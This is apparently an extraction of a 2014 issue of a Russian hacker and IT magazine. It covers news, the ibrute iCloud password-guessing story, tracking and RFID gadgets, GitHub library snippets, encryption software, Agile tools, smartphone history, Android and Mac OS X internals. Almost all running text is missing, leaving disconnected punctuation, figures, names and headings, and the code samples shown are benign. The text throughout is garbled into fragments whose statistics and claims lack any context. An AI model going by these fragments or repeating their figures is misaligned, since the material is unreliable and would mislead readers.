
16+

189

Cover Story

JSONP

Rosetta Flash
. 68

Android

. 46

,
, ,



Python
. 92

. 14

. 72

10 (189)

: 02.10.2014



rusanen@real.xakep.ru



chernova@real.xakep.ru



PC ZONE, , UNITS
ilembitov@real.xakep.ru

ant

ant@real.xakep.ru


UNIXOID SYN/ACK
kruglov@real.xakep.ru

goltsev@real.xakep.ru


X-MOBILE
execbit.ru

rusanen@real.xakep.ru

Dr. Klouniz

MALWARE,
alexander@real.xakep.ru

. ,
, ,
-
.
, , ,
100 .
, -
,
. . ,
, , ,
sensitive- . , , .
. .
, . -
Agile/Scrum, Android
root , OS X iOS. JSONP time-based ,
- Python Native Client .
.
, ibrute ,
iCloud .
C++,
C++.
, . , . .

DVD

ant

ant@real.xakep.ru

D1g1

Security-
evdokimovds@gmail.com


PR-
yakovleva.a@glc.ru



samsonenko@glc.ru


shop.glc.ru, info@glc.ru, (495) 663-82-77, (800) 200-3999 ( , , )

(lapina@glc.ru)
: , 109147, / 50

: claim@glc.ru. : 115280, , . , . 19, . : : 606400, ., -, . , .,


. 13. : , 614111, , . , . , . 26.
, (), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101
Kouvola, . 96 500 . 360 .
. . , , .
. : content@glc.ru. , , 2014

Stay tuned, stay ][!


,
][
@IlyaRusanen

16+

2014

189

004 MEGANEWS
012 IBRUTE, ,
014 100$ , , ,
028 GO, GITHUB, GO!
030 CyberSafe
034 Agile
040 20
046 Android, root
051 , Mac OS X
056 EASY HACK
060
066 SDLC
068 JSONP Rosetta Flash
072
080 X-TOOLS C
082 20
088 ][-: ON DEMAND
092 Python
096 C++ Native Client
100 Windows Phone, Baidu Yi, Ubuntu Touch, Tizen, WebOS, FirefoxOS
107 : Mail.Ru Group
110

++. ,

116

11

122 , OpenLMI
128 , Packer development- production-
132 MySQL
137 PICASO 3D DESIGNER 3D-
140 FAQ
144 WWW2 -

MEGANEWS

Apple Watch
--

Mifrill
mifrill@real.xakep.ru

APPLE

- Apple
,
,
.
, , .
,
, . 38 42
: Apple Watch ( ), Apple Watch Sport ( ) Apple
Watch Edition ( ). 18 . (Retina,
) ,
, . Apple Watch .
, Apple
iPhone 5 . .
Apple Watch Siri
. Emoji.
. -


Watch, , Twitter ( ). Apple Watch
, 349 .
, Apple iPhone 6.
, iPhone 6 iPhone
6 Plus, . iPhone 6 4,7 (1334 750), iPhone 6 Plus
5,5 (1920 1080),
, , :). 6,8 7,1 ( iPhone 5S 7,6 ).
64- A8.
, 13%
7, 20% .
50%. iPhone 6 32 , iPhone 6 Plus
37 .

iPhone 6
,
- ;
16,
64 128 .

, APPLE
IPHONE 5 .
,

10 /189/ 2014

,

UBUNTU ,

Ubuntu. , 2013
, , - Ubuntu , -

.
, . Ubuntu ,
. ( ,
, Ubuntu ). , , , ,
, .
( Ubuntu 14.04.1 , ), : Ubuntu
. , , , ,
.

,
-



open
source.

GOOGLE
YAHOO
PHP

,
-, IT-.
Yahoo,
. ,
2015 Yahoo Mail
PGP, . ,

.
Gmail .
, , End-to-End , Google PGP Gmail.
, . , Wall Street Journal
,
, .

, ( )
, ,
Yahoo.
,
! , Yahoo, , , .

, Linux
.
,
.
.

LINUX


GOOGLE
WIKIPEDIA

,
,
. , ,
, ,
, . ,
, ,
.
, . , , , Google 50 Wikipedia.
, , Wikimedia
Foundation . 50 - ,
, . , , , .
Google , . Google . .

,

Google
120
,


.

6%

-


2014 ,
13,4%
.
, , 6%.
, 5%.


2,2% 68,6%
.

4727

Wall Street Journal,


OpenSSL Foundation 2000 .
. . ,
- OpenSSL write-only, - ,
VMS 16- Windows.
-

Chrome

48 332 Chrome ,
10%
, 130
.
-, .

HTTP
4xx.
.


FACEBOOK
, ?


, Facebook . ,

,
-
.

Facebook Messenger . ,
Facebook Messenger Apple App Store
, : .
, ,
.
,
,
Facebook . , . Wired.

, . ,
, :
, Facebook, ,
.
, , .

, , ,

Facebook Messenger
,

App Annie. ,


.
, , -
Facebook
.

, ,
.
? . ,
- . ,
, , . , Facebook ,
.
, . ,
,
Facebook.

- .
, . , Facebook ,
70%.
, Facebook -
, .
.
? . , , , Facebook
.




,
.

?
Black Hat 2014 : 127 ( )
, , ,
. , Black
Hat , ?

86%

88%

?
:

51%

29%
/

99%

19%

1%

, ,
,




MICROSOFT
CEO ?

, ,
- Microsoft . ,
, Microsoft , 34 .
58- ? , . ,
LA Clippers
NBA.
. ,
CEO Microsoft ... .
, . ,
1980 .
2015
.
, STRAMGT588: Leading
organizations.
Microsoft 2007 .

BITTORRENT- TRIBLER

, BitTorrent-
uTorrent. ,
, . - uTorrent ,
, Tribler.
Tribler,
BitTorrent-, .
Tribler, , ,
, . , Tribler (6.3.1)
, Tor.
, Tribler . Tribler. , 100%- ,
Tor, IP-
.
- , -
50 . , ,
.

ANDROID,

18 796

, Google

43%

Open Signal Android-,


: ,
. 18 796 .

Android-
Samsung

11 868


Samsung

3997

47,5%

20,9%
91%

Android KitKat

iOS- iOS 7


,
HTTPS,

Google.


HTTPS

.

,


Bugzilla,

97 .

Google Gmail,

, Unicode
Consortium.
(, o
).

, , , , , . , IT - , :).
, ,
Gmail 5
, . Bitcoin Security, (forum.btcsec.com/index.php?/topic/9426-gmail-meniai-parol/) ( ). , 60%
- .
, .
1 261 809
..
Infosliv Bitcoin Security, . , Google, , ,
85% , . ,
, .
.
. Gmail . Mail.Ru.
4 664 478 . : forum.btcsec.com/index.php?/topic/9403-mail-vnimanie-meniaiparol/, , , Mail.Ru. -
Mail.Ru , 95% 4,5-
, .

Microsoft
Reddit AmA , IE Ultron,
,
.
Microsoft .



252 301
:

qwerty

32 776
:

123456789
16 538
:

111111

3761
:

1234

Dropbox .
? ,
Dropbox Pro
99 ( 9,99 ).
1 . ,
: 99 130 ,
Dropbox
.



- , ,

?
Nokia
.
, ,

.
.

,
.

.
.
,
. :


. ,
.


1323


Twitter
Twitter
. ,
8,5% ( 23 )
,

-
.
.
,
, 5% (13,5 ). ,
271 .

354,5

...
:
. ,

,
.

. .
.
,
pop-up




2014
1,3
, ,

. 60
, 145
, 77%
.

: 65
.


GOOGLE NASA

,
, AMAZON

Amazon , , Google NASA .


, , NASA.
,
,
, .
NASA. , .
, 120150
.
, .
,
, . ,
, . , ,
. , ,
. ,
.
NASA , , Google
. , Google
X (Project Wing),
. ,
.
, , .
(). The Atlantic, .
Google X , ,
.

Google Street View


. Amplifon

Street View
-,
.
.
Amazon
( )
. ,



,
.

.

270 ,
. ,
@Mail.ru, , 350
.

Twitter ,

.
hackerone.com/twitter. 140 ,
.

Opera Software
2014 ,

38% 100 .
Opera
9,5
6,1 .


IBRUTE,


, Hackapp
@hackappcom

,


iCloud. ,

. ,
, ,
.
, -
.
,
.

ibrute,


defcon. ,

. (j.mp/1tXnenm),

Keychain iCloud.
,
iCloud, ,
. , , ,
Apple , .
, , iTunes
App Store ,
Apple ID (, , iPhone 5s, , -
).

,
. , , ,
,
Apple.
.
, ,
. ,
-, :
1. .
2. .
3. .

-,
, IMAP, - API , , ,
IMAP ?
Apple. c icloud.com
iTunes Apple ID , API,
Find My iPhone,
. SSL MITM . ibrute.

,
.
rockyou.
com, 500 , iCloud.

GitHub (github.com/hackappcom/ibrute) .
. -
4chan .
GitHub
, -

Reddit. .
Apple , , , -, ,
.
The Next Web (j.mp/tnw-ibrute), , ibrute
.
.
Mashable (j.mp/mb-ibrute).
...
, , ,
. ,
, 1 .
,
, IT, The Daily Telegraph, Washington Post Forbes.
,
, FBI, ,
18
. - ,

. .

,
... Apple, , , .
,
Android, ,
.
ibrute , , , , -
,
iCloud . ,
,
ibrute
. Apple,
-
.
, Apple.
, .
, Apple .
, Apple , ,
, , . Apple . , Apple
.

:
1. Apple iCloud?
2. Apple bug bounty?
3. ? ;)



aka Pankov404
pankov404@gmail.com
@pankov404


aka Pingman

100 $
,
, ,
, RFID

,
,
. ,
.



, , .
:
. , . . ,
, ,
,
.
. . , . .
. ,
, , , ,
.
. , . ,
.
. : , , .
. , . , - ,
.




-.
,
.
.
(bit.ly/1kAs316),
. ,
. .
, ,
,
. , ,
,
.
308+, , ,
: GSM, Wi-Fi ,
.
, :

, ,
, .
( -

), .
,

. ,
, 100%- , ,
.
.
, ,
(, , )
.
1

. 1. CC308+


. 2.

.

16
. 100 ,
. ,
, .
, , ,

, , ,
.
:

. -
,
-
3
, ,
.

- , (. 2).
, , :
, , ,
.

,
, .
, ,
. : . , ,

. ,
.

. , ,
Wi-Fi, GSM .
GSM
. :
.
, . , ,
.

( ,
:). . .)
.
,

. ,
,
, , ,
.

,
. ,

,
( ?),
. ,

. 3.


. , ,
, ,
.
.

,
. ,
,
.


. -
, , ,
, .
:
.
, WARNING

, .
,
,
,
, , ,

,


,
. ,
.
.
,

,
, ,


- .
. ,
.
(



,
,
). ,
. , ,
, -.
.

MD80
,
,
.
.

, AAA, , ,
, .
,
,
. , ,
, . , ,
-
,
(. 3) .
, ,
, , , .
. ,
,
, ,
.
, .
, , , ,
, - -.
.
, USB-, AA
mini USB. ,


. 4. MD80 AAA
. 5.


.
,
. ,
( ), , .
, , , .

-
-
. , :).
,
, ,
.
,

. .

, ,
.
microSD, .
, , ,
. , , .
,

-

:


,
. .
,
( ).
;).

!

WARNING


,
,

.
.

.


, .
,
,
: ,
, .
, , .
(,
, ),
.



, , , ,
.
,
, .

,

, . ,
,
,
. .
,
.

,
ISO 27001.

. .
, , .
( )
, . , ,
.
,
.

- 30
(. . 6).
,
:
.

, -
, . , , ,
.
,
.
, ,
, .
, , -

:


,
,
?
, :)

, ( :
).
,
, , , ,

, . (
)

.
, ;)
.
: ,


.

. 6.
6


. 7.

. 8.

, , ,
. , ,
,
,
.
.

, , -
. -,
,
, . , ,
, ,
. , . , , , 25 .

, , (. 7), ,
.
,
,
, (. 8).
,
,
. . , ,
, ,
. -,
-: , . -
,
. ,
, .
. , , . ,
.
,
, ,
,

- ,
. ,
. -,
-

,
, , INFO
, ,
. . , ,


. -
17
. ,
.
, .
.
,

.
(. 9).


, ,

.

-
-, - .
, , ; - ,
.
. ,
,
-.
.
, , - . ,
,
. , ,
- 40% (, ).
,
-.
,
, .
40% , .
, : ,
, .
,
, .
, -
. (,
, ,
.
9

. 9.

, :). .
.). .


, .
, -
.
,
. ,
.
, - ,
. ,
, ,
. . ,
.
, .
, ,
.

,
.
,
, .

,
,
. , ,
, , - , - .

,
,
.
, . ,
.
10

. 10.


, ,
, ,
.
.
, . , : ,
.
,
, -, , , ;

, ,
(
. ), ,

,
.
- , :

,

-
,
.
.
308+

,

, ,


, ,

. ,


, .
(BIT.LY/1SB0LT1)
,

,
, .

308+:

.
.
, ,
, ,

,
11


. , .
,
.
:
1. .
2. .

. 308+
2,5 , , .
. ,
mini jack 2,5,
816
,
, , .
. , . 11.
. 11.


12

. 12.

,
, .
. , , ,
(
), (
). ,
,
, . .

.
:
.
, ,
.
: Press and hold to play and repeat message, release to stop.
,
. MP3- ,

. , ,
: , .
, ,
,
.
, ,
, ,
.
, ,

13


, .
, :
, , .

,
, .

.
7 , -


MP3
,

. 13.


14

. 14.

, .
. -, .
308+,
, ,
.
, ,
.

, , .
, ,

.
. . 14
, ,
.

,
,

.
,
,
,

.



. ,
,
,



.
,


,
. , ? ,
, ,
,
300400 .
40- , ,
.
,

, .
,
! , . ?
,
, ,
,
. , :).


RFID.

-, ,

, RFID.
RFID . RFID ,
.
RFID- 125 .

24 (. 15).
:
read write, , . 15

16

. 15 . 16. RFID-


.
:

. ,
, , -

RFID-

DEF CON (bit.ly/1p4v3I9),
RFID- ,
- RFID-.
, - .
.
, ,
17
,

,
Wi-Fi,

,
. ,

.

. 17.

. ,
, -
(
, :)).
,
AAA
- ,

.

, , ,
.
RFID 20 . HID-
,


18

19

-.
, Windows Linux.
,
. .
,
. , ,

. , ,
, . ,
, .
, , . ,

.
,
,
. ,
. , RFID- , , ,
.
(
,
). , ,


. 18. RFID-
. 19. RFID-
. 20. RFID-


.
, , , , ,

, , ,
.
, . , .
20



RFID .
,
. , , , , , , .
. 21 21
, HID-,
-.
, ,

: ,
, ,
. , ,

: ,
,
, ,
,
, . ,
,

,
- ,

,
. -

,
, ,

. , , , ,
.

,

21

. 21. C

. ,
- . - , , . ,
. , ,
, . . , . ,
. ,
, , , . - .

28

PC ZONE


GO, GITHUB, GO!


,
,
. GitHub
, .
, .


@ilya_pestov


rusanen@real.xakep.ru


Gogs
https://github.com/gogits/gogs
5
GitHub?
Git-
. Gogs
open source Bitbucket GitHub,
, Go.
:
;
;
SSH/HTTP(S);
SMTP / LDAP / reverse proxy ;

;
:
create/mirror/delete/watch/rename/transfer
public/private repository;

Migrate Migrate API


GitHub;
Issue tracker;
-;
MySQL, PostgreSQL SQLite 3;
GitHub, Google, QQ, Weibo.


Gogs GitLab,
, Ruby.
, GitLab . GitHub
13 3 .
: Bell,
AT&T, IBM, Qualcomm, NASDAQ OMX, Red Hat,
Alibaba.com . GitLab ,
Go .

Timesheet.js
https://github.com/semu/timesheet.js

, . Timesheet.js
. dist/timesheet.js
dist/timesheet.css,
:

<div id="timesheet"></div>
<br>
// Arguments: id of the container element, first year, last year, list of events.
// Each event is [start, end, label, CSS class]; ['2003', 'Had very bad luck'] is the short [start, label] form.
new Timesheet('timesheet', 2002, 2013, [
  ['2002', '09/2002', 'A freaking awesome time', 'lorem'],
  ['06/2002', '09/2003', 'Some great memories', 'ipsum'],
  ['2003', 'Had very bad luck'],
  ['10/2003', '2006', 'At least had fun', 'dolor'],
  ['02/2005', '05/2006', 'Enjoyed those times as well', 'ipsum'],
  ['07/2005', '09/2005', 'Bad luck again', 'default'],
  ['10/2005', '2008', 'For a long time nothing happened', 'dolor'],
  ['01/2008', '05/2009', 'LOST Season #4', 'lorem'],
  ['01/2009', '05/2009', 'LOST Season #4', 'lorem'],
  ['02/2010', '05/2010', 'LOST Season #5', 'lorem'],
  ['09/2008', '06/2010', 'FRINGE #1 & #2', 'ipsum']
]);

GitLab
-
iPhone, Android, Chrome .
. , , ,
Gogs .
Gogs , , (gobuild.io).

Accessible HTML5 Video


Player
https://github.com/paypal/accessible-html5video-player/
PayPal,
, .
, WebVTT. 18 , 5 .


Tracking.js
https://github.com/eduardolundgren/tracking.js
( 7 ),
. Tracking.js , , , -.
,
, .
:

window.onload = function() {
  var img = document.getElementById('img');
  // Detect faces in the image with the 'face' classifier.
  var tracker = new tracking.ObjectTracker('face');
  tracking.track(img, tracker);
  tracker.on('track', function(event) {
    event.data.forEach(function(rect) {
      plotRectangle(rect.x, rect.y, rect.width, rect.height);
    });
  });
  var friends = ['Thomas Middleditch', 'Martin Starr', 'Zach Woods'];
  // Draw a labelled box over each detected face.
  var plotRectangle = function(x, y, w, h) {
    var rect = document.createElement('div');
    var arrow = document.createElement('div');
    var input = document.createElement('input');
    input.value = friends.pop();
    rect.onclick = function name() {
      input.select();
    };
    arrow.classList.add('arrow');
    rect.classList.add('rect');
    rect.appendChild(input);
    rect.appendChild(arrow);
    document.getElementById('photo').appendChild(rect);
    rect.style.width = w + 'px';
    rect.style.height = h + 'px';
    rect.style.left = (img.offsetLeft + x) + 'px';
    rect.style.top = (img.offsetTop + y) + 'px';
  };
};

The best of awesomeness and usefulness for web developers


https://github.com/Pestov/best-of-awesomeness-and-usefulness-for-webdev
: , , , ,
, . , ,
, , , . ,
. , ,
, , , .

Duo

Scraper

Heatmap.js

https://github.com/duojs/duo
, Component, Browserify
Go. , Duo
c ,
pull.
Duo .
, , duo-gulp,
Gulp-
Duo.

https://github.com/ruipgil/scraperjs
Scraper, , - JavaScript.
:
. API,
, . , HackerNews:

https://github.com/pa7/heatmap.js

.
UI/UX- .
Heatmap.js
API. ,
.
Gmaps, Leaflet Openlayers.

// index.js
var uid = require('matthewmueller/uid');
var fmt = require('yields/fmt');
var msg = fmt('Your unique ID is %s!', uid());
window.alert(msg);
:

$ duo index.js > build.js

var scraperjs = require('scraperjs');

scraperjs.StaticScraper.create('https://news.ycombinator.com/')
  .scrape(function($) {
    return $(".title a").map(function() {
      return $(this).text();
    }).get();
  }, function(news) {
    console.log(news);
  });

var heatmap = h337.create({
  container: domElement
});
heatmap.setData({
  max: 5,
  data: [{ x: 10, y: 15, value: 5}, ...]
});


CYBERSAFE


dhsilabs@gmail.com


FI

. .
AES 256 , Blowfish
448, Blowfish , .

TrueCrypt ( , , ) .

CyberSafe Top Secret.

Sashkin@shutterstock.com

Free, Advanced,
Professional, Ultimate Enterprise.
CyberSafe DES (
AES Blowfish , ),
. ,
//,

, .
( 64
) .
cybersafesoft.com/cstopsecret.zip,

( ), , DES
.
, ,
Professional. Advanced,
Professional , (4096
2048 Advanced). 16 ,
AES, 256 .
, ,
Ultimate. 20 ,
, 8192 ,
Blowfish 448 .
Ultimate .
Enterprise. (- ,
), ( , Ultimate), .
Ultimate: Blowfish 448 ,
8192 , .
, .


. -,
Windows XP/2003/Vista/7/8.
XP ,

.
-, , .


-, CyberSoft CA (. 1). ,
CyberSafe

. , -
, , , , .
,
? :)

. 1.

. 2.

. 3.
. 4.


,
, . . 2

. 5.


.
,
. / .
,
.
. (!) .
.
.
.


. .
.
, .
,
XP.
BitLocker, 75 Pro- . ,
BitLocker. , BitLocker, TrueCrypt Top
Secret 2 .
.
Windows XP TrueCrypt.
. :
( ), ,
.
TrueCrypt , . . , : truecrypt.sourceforge.net.
TrueCrypt.
, CyberSafe Top Secret.
, ,
.
(. 3) . (. 4).
,

.
,
( 100 ),
(. 5).
, (. 6). ,
. ..
(. 7) , (. 8).
,
(. 9). , , , , -

INFO



cybersafesoft.com/rus/.

. 6.

R R
R

TrueCrypt,
, CyberSafe
Top Secret 2. AES .
- , TrueCrypt
, CyberSafe Top Secret 2 ,
. ,
.
: https://subversion.assembla.com/svn/cybersafe-encryption-library/.

(NtKernel, AlfaFile),
. ,
.
,
TrueCrypt? BitLocker,
, ,
.
TrueCrypt
, -
.

. , ,
, .

,
.. ,
.
,
.

. 7.

. 8.

. 9.

CyberSafe Top Secret 2 TrueCrypt. ,


-
. . ,
, .
, , ,
.

R F
I :
DR ID
.

Android.
CyberSafe Mobile. , CyberSafe Mobile,
CyberSafe Top Secret, .
: https://play.google.com/store/apps/details?id=com.cybersafesoft.cybersafe.mobile.


Doggygraph@shutterstock.com

34


max.mosin@gmail.com

AGILE


(: Redmine) , . ,
.

INFO

INFO

YouTrack
JetBrains, -.


Scrum
.


AGILE SCRUM?
Agile- , (
).
, :
;
;

;

.
, ,
.
Agile. Scrum.
Scrum , , , .
Scrum:
Product Backlog , ;
Sprint Backlog ,
;
Sprint , (
), ,
;
.
Scrum
(. 2), . , -, :
, ,
;
, ;
,
.

,

.

. 1. ,

Scrum
. 2. Scrum

- ?

,
, .
, , , , .

Redmine?

Redmine , . , , , , . ,
, . Scrum : , , ,
, c Git SVN .

?
, ,
.

: , , ,
, .
Git: Git SVN.
:
Scrum.
: , , , .
: ,
Redmine.
: .

.
.
email: , (Redmine ).
:
.
: .
: , .
: .


:
JIRA Agile, Trello, Targetprocess, Assembla YouTrack JetBrains. 10- .

Assembla

:
Git:
: Web
: 7 ( 10), , 2/3
: 6 ( 10)
: 8 ( 10)
: 9 ( 10)
: 4 ( 10)
email:
:
:

:
: CSV, XML
: 8 ( 10)
: 30 49 , 50
99

Assembla

. : 19:30

. : , . , /
. Stand Up. .
. , . .
-, . ,
- , .

JIRA Agile
:
Git:
: Web
: 7 ( 10)
:
: 6 ( 10)
: 8 ( 10)
: 8 ( 10)
: 0 ( 10)
email:
:
:
: CSV, XML
: 6 ( 10)
: 25 600
, 50 1100

JIRA Agile

JIRA Agile


JIRA, JIRA Agile,
Scrum. . - .
. , . , , , YouTrack.
, . Assembla YouTrack .
: , . ,
, .


Trello
:
Git:
: Web
: 6 ( 10) ,
:
: 6 ( 10)
: 6 ( 10)
: 5 ( 10)
: 0 ( 10)
email:
:

:
: HTML
: 4 ( 10)
: 5

INFO
YouTrack



.

Trello

, , , : ,
, . . . , .
, , , , , , , , .
- , .
.
Trello

INFO
Scrum

1986
.


YouTrack
:
Git: , TeamCity
: Web
: 8 ( 10)
:
: 8 ( 10)
: 8 ( 10)
: 9 ( 10)
: 8 ( 10)
email:
:
:
: CSV, HTML
: 9 ( 10)
: 25 500
, 50 750

YouTrack

YouTrack ,
. , ,

. ,

-,
. , , ,
, , ,
.

-,
. . 750 , -
,
,
YouTrack,
.

YouTrack

- .
Trello
,
. Targetprocess:
Trello, . , ,
,
, Targetprocess .
, , ,
.

YouTrack

JIRA Agile .
, ,
. ,
- , .
- ,
, , , , , , .
:
Assembla YouTrack. , . Assembla ,
, -


Targetprocess
:
Git:
: Web
: 8 ( 10)
:
: 6 ( 10)
: 6 ( 10)
: 4 ( 10)
: 0 ( 10)
email:
: ,

:
: CSV
: 5 ( 10)
: 25 ,
249

Targetprocess

Targetprocess

Targetprocess

, , . , ,
Trello, . , ,
. , . , -
, , , , . ,
, , ,
- , . Targetprocess .

. YouTrack . ,
, ,
. Assembla Git. YouTrack , TeamCity,
,
. Assembla Stand Up
, YouTrack.
, , ,
YouTrack. -
( ). Assembla , ,
, . ,
, , , . ,

. YouTrack - , , Assembla .
,
. , YouTrack ,
,
, . ,
,
,
, - ( , ).
,
YouTrack.


PopOnAir@shutterstock.com


20

iPhone :
. , , ,

.

IBM SIMON


apismenny@gmail.com

(1994)

1992 COMDEX
IBM,
. : Motorola StarTAC,
, , Palm Pilot
, Apple MessagePad 100,
Newton, , . -
NAND ( ) ,
. ,
iPhone, .
.
IBM Simon 3,3 160 293 .
1 ( Windows 95 4 . . . .),
16 . ,
DOS , . : , , , , .
Simon , . , :
,
,
, cc:Lotus -

NOKIA 9000 COMMUNICATOR

. PCMCIA, !
.
, , Simon, IBM .
1994 BellSouth
Simon 1100
1750 .
, Simon ,

,
Simon 900 , 600.
: 50 .
Simon ,

. Simon - , .
, .
,
, .

. ,
IBM .

(1996)

Nokia :
, , . Nokia 9000 Communicator.
IBM Simon , . Nokia 9000 - , Intel,
24 , 4 4 ,
. , , , 640 200 . , ,
, .
Nokia
GeOS.

GeOS Commodore Apple II.


: , , , , , HTML .
, , .

,
Nokia 9000 GSM.
,
.
Nokia 1998 9110
(33 ),
2001 Nokia 9210
Symbian OS.

42

ERICSSON GS 88 PENELOPE


1997


Ericsson c Sony-Ericsson,
Sony.
Ericsson
, . Ericsson

, .
1997 .
IBM Ericsson
. 1997
GS 88, Penelope.

ERICSSON R380

ERICSSON P800

,
,

QWERTY-
-- Nokia 9000.
: , GeOS. GS 88
WAP.

, Ericsson
: ,
.
, : GS
88 ,
.

(2000),
(2002)

Symbian
Nokia,
, Psion.
Symbian : Ericsson Motorola. Symbian
, GeOS Nokia
Ericsson.
Ericsson
Symbian. Ericsson R380,
. R380 , Nokia 9000: 164
26 397 38 Nokia. ,
, R380
. ,
- Graffiti Palm OS .
: , -, SMS, WAP, ,
, .
: HTML ( Nokia 9000 ) .
Ericsson : GSM
!
2002 , Sony
Ericsson P800, R380, -

Ericsson R380

Ericsson P800

, , . P800
32- , 16
640 480 .
Symbian 7.0 UIQ 2.0
.


20

QUALCOMM PDQ

(1999),
(2002)

KYOCERA 6035

(2001),

HANDSPRING TREO

Palm Treo , Palm


OS . , Palm
,
Palm .
Qualcomm, 1999 pdQ
800. Ericsson R380, , , Graffiti . , Palm OS
, .
Palm OS, GSM . 2000 Qualcomm
Kyocera, pdQ 800 Kyocera 6035.
2001 .
Palm OS Handspring, Treo. : Treo
180, 180g 270, Treo 300 CDMA. 180g
Palm, , .
Graffiti, . Treo 180 Graffiti
, Palm OS. , - , ,
. Treo 270 (700 400), . : Motorola Dragonball
33 16 .
2003 Palm Handspring - Treo.
2008 , Palm Treo Pro
Windows Mobile Palm OS. Palm : Palm Pre, webOS, HP.

BLACKBERRY 5810

(2002)

BlackBerry Research in Motion


. , Android. RIM , BlackBerry
. , PCMCIA
, ,
.
RIM, , BlackBerry 5810. 2002 : , QWERTY-, .
GPRS, BlackBerry, , .
Java. 5810 - ,
. , , , .
RIM : BlackBerry
, , , .

Qualcomm pdQ /
Kyocera 6035

Handspring Treo
180 270

44

DANGER HIPTOP


(2002)

Danger (
, ),
.
Danger Hiptop, T-Mobile Sidekick.
Danger
: , . BlackBerry ,
Hiptop . ,
. , , ,
, , , .
Hiptop ,
. ,
( Download Catalog),
. , Danger
, 2003 Android
Google.
Danger T-Mobile Hiptop 2008 , Microsoft. Danger
Kin, Hiptop
Microsoft. , : ,
, .

Palm
,

IPAQ H6315

(2004)

Windows Pocket PC . Palm ,



. ,
.
iPaq h6315 HP. Treo, BlackBerry:
,
,
, . : (200 .
. .), 64

, 240 320,
, SD , MP3, Wi-Fi 802.11b
GPS. , .
h6315 :
Windows Mobile,
(
), .
, , , .
,

Windows Mobile .
Palm Windows
Mobile , .


20

NEONODE N1M

(2005)



,
.

iPhone,
.



( !)
Neonode.
Neonode N1m
-
, : 88
52 21 , 94 .
176
220 , zForce.
; , ,
, , . zForce ,
.
Windows CE 5.0
. ,
SD . ,
, , N1m,
, :
. 2008 Neonode ,
zForce.

,
iPhone 2007 . Windows Mobile,
, , . WM,
BlackBerry, Symbian.

. 2007
, , 2008
HTC Dream G1 Android.
Windows Mobile Windows Phone, Palm
, Sony-Ericsson Ericsson, Nokia Microsoft.
- Tizen, Sailfish,
Ubuntu Firefox OS.
,
, , , .
iPhone 6 - ,
IBM Simon.

BlackBerry 5810

, ,
, ,

IBM Simon

iPhone 6

46

X-Mobile



ANDROID,
ROOT


rommanio@yandex.ru

: Droid- . root
-
, - . Google,
.


Google . Android , , ,
. , .

Android, .

Android
, root, .
,

,
.
. -
,
( , ).
.
, .
-,
, . -,
.
.
, . , ,
:
,
?
,
- .
Email Exchange
Gmail.
Google (, Google
Now).
Google Keep, Google+ Google.
, ()
. ,
, .
. .
(Samsung )
.
, Home Screen
. ,
100500 ,
?

. ,
,


. ( ) , ,
.
-, API , , PowerManager
API,
. Samsung Galaxy Note 10.1 (,
Droid- )
DVFS Dynamic Voltage
and Frequency Scaling, ,
Samsung (
, ).
( ) , .
, , / .
:
,
(
).

. , , ,
. , ,
-.



INFO

.
setApplicationEnabledSetting()
PackageManager,


COMPONENT_ENABLED_STATE_DISABLED_USER (
,
Android).


. , /
, ,
.
, Smart Launcher ,
TouchWiz. ,
, .
/.
: -
Busybox, PID (
'ps w') /proc/<PID>/status. , ,
Android
.

top.
, Process Explorer, , ,
?
, Google Play
, , , .
,
.
Play , (:


-, ),
.

(, , ). ,
, ( ,
, , ,
Google+ . . .). , ,
.



Android
(SD-) . ,
, . .
.nomedia . Android 4.0 , , ,
.
.nomedia.

. ,
,

.

Samsung
- ,
,
Home .
, S Voice
. ,
, .
. , ,
.
, Samsung
. , (Home screen settings)
(Transition effect)
(None).

HTC
HTC
. , , -

S Voice


DR ID

Android.
, , , :
Google Maps RMaps. , .
Adobe Reader MuPDF.
. AlReader
FBReader.
Lightning Browser, -
.
RSS- Feedly
FeedMe (, ).

HTC (Tell HTC)


.

Sony
Sony Xperia SP ,
. ,
Google Chrome: Chrome .

GREENIFY
Greenify ( ) ,
, . -,
( ,
). , , .
, forceStopPackage(), Greenify ,
, root. -root- killBackgroundProcesses(),
,
, Greenify.

INFO



(Bluetooth, Wi-Fi,
GSM...).

Android
. root
,
. , :
Low Memory Killer
,
. , . : Auto
Memory Manager MinFree.
/system/app
/system/priv-app.
root.
Bloatware Freezer,
Autostarts.
Zram,
TCP westwood. .

.

-root Greenify
.
Accessibility Service, ,
Android. , , , Greenify ,
.

ART
Android 4.4 Dalvik ART, Android Runtime.
AOT-. , ART, .
, Android,
Java - ,
. - ,
Java- . ,
.
. Android 2.2 Dalvik JIT-.
, . KitKat ART,
.
, . , , , .
, 50%,
( ,
).
ART .
,
.
, . .
( HITB) ,

DEX- (dex2oat) . ,
ART, user-mode-. , boot.oat,
, (0x700000),
ASLR.
- OAT- , .
. , OAT- ELF, , , GDB.
... .
ART
Google ( Dalvik, , ).
,
Dalvik , Google . ( )
ART KitKat,
.


Android,
/
. , . :
,
, .


,
MAC OS X

Mopic@shutterstock.com


androidstreet.net


, Apple iOS. ,
iOS Mac OS X. , Mac OS X POSIX- Darwin, ,
IT, , Darwin XNU, Mach FreeBSD. ,
, iOS .
MAC OS X
,
( ) ,
1988 , IT ,
-
NeXTSTEP. NeXTSTEP . Apple
NeXT, .
NeXTSTEP ,
. Mach, FreeBSD, . NeXTSTEP
Objective-C API.
( OS X iOS)
,
.
NeXT Apple 1997 NeXTSTEP
Rhapsody, Mac OS 9. 2000 Rhapsody
Darwin, APSL, 2001
MacOS X 10.0, .
Darwin , 2007-, , .


NeXTSTEP.
,
OS X/ iOS

XNU DARWIN
OS X / iOS : XNU,
POSIX ( /)
NeXTSTEP, , API
. Darwin , OS X. iOS-,
ARM -

Darwin

,
( ,
iOS ).
Darwin UNIX- , POSIX API, , , UNIX-.
FreeBSD
- Arch Linux, UNIX-, ,

GNOME KDE.
Darwin XNU, , , Mach -

[Figure: Darwin and XNU diagram. Labels: libSystem.B.dylib, libc.dylib, libm.dylib, other Darwin libraries, kernel/user transition, Mach traps (mach_trap_table), BSD system calls (sysent), IOKit, BSD, Mach, scheduling, IPC, VM, security, VFS, /dev, Mach abstractions, ml_* APIs, Platform Expert, hardware.]


FreeBSD, ,
( VFS).
Mach FreeBSD, OS X API
, I/O Kit
C++, - ,
.
iOS XNU, , iOS , , Apple, . ,
,
.
XNU, ( + /) /System/Library/Caches/com.apple.kernelcaches/kernelcache
.
Darwin UNIX/
BSD,
(libc, libmatch, libpthread ),
, (bash, tcsh ksh) , launchd SSH-. ,
, /System/Library/LaunchDaemons/ssh.plist. , , .
Darwin , , , OS X / iOS.

iOS Apple

INFO
